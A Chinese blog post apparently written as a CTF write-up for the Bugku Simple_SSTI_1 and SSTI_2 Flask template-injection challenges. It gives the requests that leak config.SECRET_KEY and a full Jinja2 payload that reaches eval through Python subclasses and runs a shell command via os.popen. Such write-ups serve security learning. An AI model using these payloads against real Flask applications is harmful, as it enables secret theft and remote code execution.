ctf系列-bugku靶场 web记录 SSTI 1 2 python flask框架 模板注入

已于 2022-03-11 14:02:34 修改
阅读量793 收藏 1
点赞数 2
分类专栏: ctf 文章标签: python 开发语言 后端
于 2022-03-04 14:59:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/123274250
版权

ctf系列-bugku靶场 web记录

Simple_SSTI_1 模板注入

(1)启动环境
在这里插入图片描述
(2)抓包访问链接
发现响应包 显示为python服务
源码 提示
你需要传入一个flag的参数
你知道,在这套flask框架中,我们经常设置一个secret_key 变量
在这里插入图片描述
(3)测试flag参数
http://114.67.175.224:17072/?flag={{2*2}}

在这里插入图片描述
(4)根据提示获取SECRET_KEY变量
http://114.67.175.224:17072/?flag=flag{{config.SECRET_KEY}}
在这里插入图片描述

SSTI_2

依旧根据源码提示 说有flag 参数
测试 flag{{2*2}} 发现存在模板注入

直接利用 ssti模板注入的payload

?name={% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.__globals__.values() %}{% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{ b['eval']('__import__("os").popen("id").read()') }}{% endif %}{% endif %}  {% endfor %}{% endif %}{% endfor %}

在这里插入图片描述

LuckyCharm~
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF_Web:从0学习Flask模板注入SSTI
AFCC_的博客(Web_Dog)
08-30 3685
0x01 前言 最近在刷题的过程中发现服务端模板注入的题目也比较常见,这类注入题目都比较类似,区别就在于不同的框架、不同的过滤规则可能需要的最终payload不一样,本文将以Flask为例学习模板注入的相关知识,也是对自己学习的一个记录。 0x02 Flask简介 Flask是一个Python编写的Web框架,让我们可以使用Python语言快速实现一个网站或Web服务。优点就在于开发简单,代码量少,很多工作都在框架中被实现了。他与Django不同于Django是一个全能型框架,通常用于编写大型的网站。
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用,两种方法一道题
07-16
### CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用 #### 知识点一:SQL注入基础与Union注入原理 **SQL注入**是一种常见的网络安全攻击方式,通过将恶意SQL代码插入应用程序接收的数据中,进而操纵...
WEB攻防-Python-PYC 反编译&CTF 与 CMS-SSTI 模版注入
weixin_45534587的博客
06-05 1143
SSTI,即服务器端模板注入(Server-Side Template Injection),是一种注入攻击,漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,没有严格控制对用户的输入,使用了危险的模板,导致执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。
apachecn#apachecn-ctf-wiki#BugkuCTF-WEB解题记录-11-15_weixin_3069946
07-25
BugkuCTF WEB解题记录 11-15_weixin_30699463的博客-CSDN博客来源:
bugkuctf解题-WEB
05-04
同时,了解常见Web框架(如PHP的Laravel、Python的Django)的安全特性也对解题大有裨益。 此外,解题过程中,理解Web服务器的配置、日志分析、源码审计等都是必不可少的技能。对于复杂的问题,可能需要结合其他领域...
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
【标题】"BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip" 指的是2021年BugKu网络安全平台举办的AWD(Attack-Defend,攻防)CTF(Capture The Flag,夺旗)排位赛的实战题目,其中的"7"可能代表该赛事的第七个...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
内容概要: CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息... 使用场景: ... 其他说明: ...
Python】pandas:排序、重复值、缺省值处理、合并、分组
yannan20190313的博客
07-30 1205
Python】pandas:排序(sort_index,sort_values,nsmallest,nlargest)、重复值(duplicated,drop_duplicates,value_counts,nunique)、缺省值处理(isna,isnull,notna,notnull,fillna,dropna,replace)、合并(join,merge,append,concat)、分组(groupby)
本地部署 Llama-3-EvoVLM-JP-v2
最新发布
engchina的专栏
08-04 317
本地部署 Llama-3-EvoVLM-JP-v2
Selenium与WebDriver:Errno 8 Exec格式错误的多种解决方案
ip16yun的博客
07-30 453
在使用Selenium和WebDriver进行网页自动化时,可能会遇到各种错误。其中一个常见问题是执行格式错误(Errno 8 Exec format error)。这个错误通常在运行ChromeDriver时出现,错误提示涉及路径中的某个文件。本文将概述这个问题的背景,并提供多种解决方案,包括如何使用代理IP技术进行数据抓取。
十个好用到爆炸的Python技巧
qq_36807888的博客
07-30 674
生成器表达式与列表推导式类似,但它创建的是一个迭代器,而不是一个完整的列表。zip(names, ages) 创建一个迭代器,该迭代器生成由 names 和 ages 列表中对应位置的元素组成的元组。defaultdict(int) 创建一个字典,如果访问的键不存在,则默认值为 0 (int 类型的默认值)。惰性求值: 元素是在需要时才计算的,而不是预先计算好存储在内存中,这在处理包含复杂计算的序列时非常有用。wrapper 函数是装饰器函数内部定义的函数,它调用被装饰的函数,并将结果转换为大写。
python字符串数据容器练习(replace,split,count)
2301_79600015的博客
07-31 528
Python字符串是由一系列字符组成的数据类型。在Python中,字符串是不可变的,这意味着一旦创建了一个字符串,就不能修改它的内容。以下是关于Python字符串的一些重要知识点:1. 字符串的基本操作:拼接字符串:使用`+`运算符。重复字符串:使用`*`运算符。索引和切片:使用`[]`和`:`操作符访问字符串中的子串。长度:使用`len()`函数获取字符串长度。转换大小写:使用`upper()`和`lower()`方法。分割和连接:使用`split()`和`join()`方法。
Python面试题:如何使用WebSocket实现实时Web应用
bigorsmallorlarge的专栏
07-30 608
通过上述步骤,你可以使用 Django Channels 和 WebSocket 创建一个简单的实时 Web 应用。Django Channels 提供了强大的功能,使得在 Django 中实现实时功能变得更加容易。你可以在此基础上扩展,添加更多功能和复杂的逻辑。
Python入门知识点 10--闭包与装饰器
@网工小赵的博客
07-30 962
什么情况下会用到装饰器特性:在不修改源代码的基础上,给函数加功能。
BUG】Gunicorn [CRITICAL] WORKER TIMEOUT (pid:41518)
集电极
07-31 204
在使用Gunicorn 启动一个Flask服务后,访问接口响应错误,查看日志发现了该错误。具体上,我的接口大约需要2分钟才将结果返回,因此我的超时时间应该设置为200秒比较合适。秒内没有返回结果,Gunicorn 会弹出超时错误,并且会杀死flask服务重启。:接口返回时间超时。默认情况下,Gunicorn 超时时间为。样例,设置超时时间为200秒。解决方法是在启动命令中。
python 的pip包管理工具 requirements.txt 怎么用
yuguang的博客
07-31 465
如果你想要安装最新版本的包,你可以省略版本号,但这样做可能会使你的项目在不同环境中表现出不一致的行为,因为包的最新版本可能会引入不兼容的更改。在Python中,尤其是与pip和包管理相关的上下文中,requirements.txt文件用于列出项目所依赖的外部Python包及其版本。这里,-r选项告诉pip从一个文件中读取要安装的包列表,而requirements.txt就是包含这些包信息的文件名。执行这个命令后,pip会读取requirements.txt文件中的每一行,并尝试安装或更新到指定的包版本。
python中的三元表达式
cyj0919的博客
08-01 241
三元表达式是一种简洁的方式来根据某个条件选择两个值中的一个。它由三个部分组成:条件判断、冒号(:)、然后是两个可能的结果。
python---为某个项目使用虚拟环境
weixin_45880844的博客
08-01 678
通过在虚拟环境中开发,你可以确保你的代码在不同环境中(包括生产环境)的表现一致,因为依赖是被隔离和明确定义的。:如果你正在开发自己的Python包,并且希望在项目中使用它,你可以轻松地将包链接到虚拟环境中进行测试。:虚拟环境允许你为特定项目使用不同版本的Python解释器,即使全局环境中使用的是另一版本。:不同项目可能需要不同版本的库。:虚拟环境可以包含安全补丁或特定版本的库,而不影响全局环境中的库,这有助于减少安全风险。:在虚拟环境中,你可以安全地尝试新的包或工具,而不会影响到你主要的工作环境。
一行代码教你使用Python制作炫酷二维码
qq_36807888的博客
07-30 522
无论是简单的信息传递,还是个性化的品牌推广,MyQR 都能满足你的需求。MyQR 是一个 Python 库,用于生成自定义二维码,包括带有 Logo、彩色和动态的二维码。picture 参数用于设置背景图片,如果想要生成透明背景的二维码,可以将 colorized 参数设置为 True,并将背景图片设置为透明图片。二维码,我们日常生活中随处可见的编码方式,凭借其方便快捷的信息承载能力,已经渗透到各行各业。MyQR 真正强大的之处在于它丰富的自定义选项,让你可以生成各种样式的二维码。
sstl-lab靶场
09-02
- *2* [ctf系列-bugku靶场 web记录 SSTI 1 2 python flask框架 模板注入](https://blog.csdn.net/YouthBelief/article/details/123274250)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值